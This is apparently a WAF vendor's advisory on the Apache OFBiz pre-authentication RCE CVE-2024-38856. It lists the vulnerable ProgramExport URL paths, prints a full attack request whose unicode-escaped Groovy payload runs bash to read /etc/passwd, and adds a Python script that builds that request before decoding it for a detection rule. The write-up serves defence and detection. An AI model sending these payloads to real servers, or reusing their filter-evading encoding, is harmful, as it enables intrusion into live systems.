The vulnerability is a pre-authentication remote code execution (RCE) flaw in Apache OFBiz. Because of an incorrect authorization check in the way OFBiz processes requests for certain URLs, an attacker can have a view that should require login rendered, and code executed, without ever authenticating.
The vulnerability was patched in Apache OFBiz 18.12.15. AIWAF covers it through pattern 2228: Apache OFBiz Remote Code Execution, added in the January 2025 pattern update, and we continue to monitor related vulnerabilities.
1. Overview
Apache OFBiz is a free and open source ERP suite. We recently analyzed CVE-2024-38856, a pre-authentication RCE vulnerability discovered in the platform.
Source : https://www.helpnetsecurity.com/2024/08/05/cve-2024-38856/
2. Attack Type
CVE-2024-38856 is a pre-authentication RCE vulnerability in Apache OFBiz caused by an incorrect authorization check when requests for certain URLs are processed. The OFBiz controller applies its authentication check to the request URI segment of the path (for example main or forgotPassword, which are reachable without login) but then renders the view named by a trailing "override view" segment, so a view that should require login can be rendered by an unauthenticated request.
An earlier vulnerability in the same request handling, CVE-2024-36104, had already been patched, but according to SonicWall that fix only added a check for path traversal sequences without correcting the underlying behavior, so it could be bypassed by sending a URL that contains no path traversal syntax at all.
Source : https://www.sonicwall.com/blog/sonicwall-discovers-second-critical-apache-ofbiz-zero-day-vulnerability
The attacker targets the ProgramExport view of the webtools application, which compiles and runs the Groovy script supplied in the groovyProgram parameter, by sending the malicious script to one of the URLs below; in each of them the segment before ProgramExport is a request that does not require authentication.
The following URLs are used in the attack:
- /webtools/control/forgotPassword/ProgramExport
- /webtools/control/main/ProgramExport
- /webtools/control/showDateTime/ProgramExport
- /webtools/control/view/ProgramExport
- /webtools/control/TestService/ProgramExport
RCE attack request:
POST /webtools/control/main/ProgramExport HTTP/1.1
Content-Length: 1198
Content-Type: application/x-www-form-urlencoded
Host: www.tdst.com
User-Agent: HTTPie
groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u005b\u0022\u0062\u0061\u0073\u0068\u0022\u002c\u0020\u0022\u002d\u0063\u0022\u002c\u0020\u0022\u007b\u0065\u0063\u0068\u006f\u002c\u005a\u0057\u004e\u006f\u0062\u0079\u0042\u0062\u0063\u006d\u0056\u007a\u0064\u0057\u0078\u0030\u0058\u0054\u0073\u0067\u0059\u0032\u0046\u0030\u0049\u0043\u0039\u006c\u0064\u0047\u004d\u0076\u0063\u0047\u0046\u007a\u0063\u0033\u0064\u006b\u004f\u0079\u0042\u006c\u0059\u0032\u0068\u0076\u0049\u0046\u0074\u0079\u005a\u0058\u004e\u0031\u0062\u0048\u0052\u0064\u004f\u0077\u003d\u003d\u007d\u007c\u007b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u002d\u0064\u007d\u007c\u007b\u0062\u0061\u0073\u0068\u002c\u002d\u0069\u007d\u0022\u005d\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b
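Decoded, the groovyProgram value above reads throw new Exception(["bash", "-c", "{echo,ZWNo...Ow==}|{base64,-d}|{bash,-i}"].execute().text); and the base64 inside it expands to echo [result]; cat /etc/passwd; echo [result]; (throwing the command output as an exception is the usual trick for getting it echoed back in the error response). The Python script below is an added example written for this page; it is not code from the original post, from Apache OFBiz, or the AIWAF pattern itself. It rebuilds the request above from that shell command and then performs the normalization a WAF rule needs before it can recognize the payload: percent-decode the form body, undo the \uXXXX escapes the way the Groovy lexer will, and decode the base64 stage. The rule flags any controller request whose trailing override view is ProgramExport and whose body carries groovyProgram, and reports which request URI received the authentication check. As an assumption that goes slightly beyond the page, it percent-decodes the path first so the ../ProgramExport shape used by the earlier path traversal CVEs is caught by the same check. The function names and the host www.tdst.com are illustrative. One detail worth checking: if each backslash of the escapes is percent-encoded as %5C on the wire, the body is exactly 1198 bytes, which matches the Content-Length above.

```python
import base64
import re
from urllib.parse import parse_qs, quote, unquote

# Constructed sample: the shell command hidden in the request shown above, and the
# Groovy wrapper that runs it. base64-encoding INNER_SHELL reproduces the page's payload.
INNER_SHELL = "echo [result]; cat /etc/passwd; echo [result];"
GROOVY_SOURCE = (
    'throw new Exception(["bash", "-c", "{echo,'
    + base64.b64encode(INNER_SHELL.encode()).decode()
    + '}|{base64,-d}|{bash,-i}"].execute().text);'
)


def unicode_escape(src: str) -> str:
    """Attacker side: spell every character as a \\uXXXX escape. The Groovy lexer (like
    Java's) decodes these before parsing, so the script runs unchanged while a naive
    keyword rule sees neither 'execute' nor 'bash'."""
    return "".join(f"\\u{ord(c):04x}" for c in src)


def build_request(path: str, groovy: str, host: str = "www.tdst.com") -> str:
    """Constructed: the POST above as sent. Each escape's backslash is form-encoded as
    %5C, so 148 escaped characters plus 'groovyProgram=' give Content-Length 1198."""
    body = "groovyProgram=" + quote(unicode_escape(groovy), safe="")
    return (
        f"POST {path} HTTP/1.1\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Host: {host}\r\n"
        "User-Agent: HTTPie\r\n"
        "\r\n" + body
    )


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def unescape_unicode(s: str) -> str:
    """Defender side: undo \\uXXXX exactly as the Groovy lexer will, so the rule
    inspects 'throw new Exception(...)' instead of 888 bytes of escapes."""
    return re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)


def decode_groovy_program(body: str):
    """Percent-decode the form body, then unicode-unescape groovyProgram (None if absent)."""
    params = parse_qs(body, keep_blank_values=True)
    if "groovyProgram" not in params:
        return None
    return unescape_unicode(params["groovyProgram"][0])


def extract_inner_command(groovy: str):
    """Decode the {echo,<base64>}|{base64,-d}|{bash,-i} idiom: bash brace expansion turns
    {echo,X} into 'echo X', so the one-liner contains no literal spaces."""
    m = re.search(r"\{echo,([A-Za-z0-9+/=]+)\}\|\{base64,-d\}", groovy)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-8", errors="replace")


def flag_override_view_rce(target: str, body: str):
    """Hypothetical rule. OFBiz applies the auth check to the request segment after
    /control/ (main, forgotPassword, ...) but renders the trailing override view, so flag
    any request whose override view is ProgramExport and that carries a groovyProgram.
    The direct, auth-checked /webtools/control/ProgramExport (no override) is not flagged."""
    path = unquote(target.split("?", 1)[0])   # also exposes %2e%2e style traversal
    parts = path.split("/")
    if "control" not in parts:
        return None
    idx = parts.index("control")
    segs = [s for s in parts[idx + 1:] if s]
    groovy = decode_groovy_program(body)
    if len(segs) < 2 or segs[-1] != "ProgramExport" or groovy is None:
        return None
    return {
        "webapp": parts[idx - 1] if idx > 0 else "",
        "request_uri": segs[0],       # the URI that received the authentication check
        "override_view": segs[-1],    # the view that is actually rendered
        "groovy": groovy,
        "shell": extract_inner_command(groovy),
    }


def analyse_sample(path: str):
    """Build the constructed request for `path`, parse it, and run the rule on it."""
    _method, target, headers, body = parse_request(build_request(path, GROOVY_SOURCE))
    return headers, flag_override_view_rce(target, body)


if __name__ == "__main__":
    headers, finding = analyse_sample("/webtools/control/main/ProgramExport")
    print("Content-Length:", headers["content-length"])
    print("auth-checked request URI:", finding["request_uri"])
    print("rendered override view  :", finding["override_view"])
    print("decoded shell command   :", finding["shell"])
```

The order of the decoding steps matters: a rule that looks for "execute(" or "bash" in the raw body never fires on this request, and one that only unicode-unescapes without percent-decoding first still sees %5Cu0074. The same normalization should be applied to the path, since the same view can be reached through any of the five request URIs listed above.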
3. Response
Apache OFBiz has released a patch for CVE-2024-38856; users of the product should upgrade to version 18.12.15 or later. In our AIWAF product the vulnerability is covered by pattern 2228: Apache OFBiz Remote Code Execution, added in the January 2025 pattern update.
4. Conclusion
Apache OFBiz is a powerful open source ERP used by many organizations. This vulnerability is rated CVSS 9.8 and has been added to CISA's Known Exploited Vulnerabilities (KEV) catalog, which indicates it is being exploited in the wild, so affected installations should be updated to the latest version as soon as possible.
We have developed an AIWAF pattern for this Apache OFBiz vulnerability and will continue to respond quickly to related vulnerabilities as they are discovered.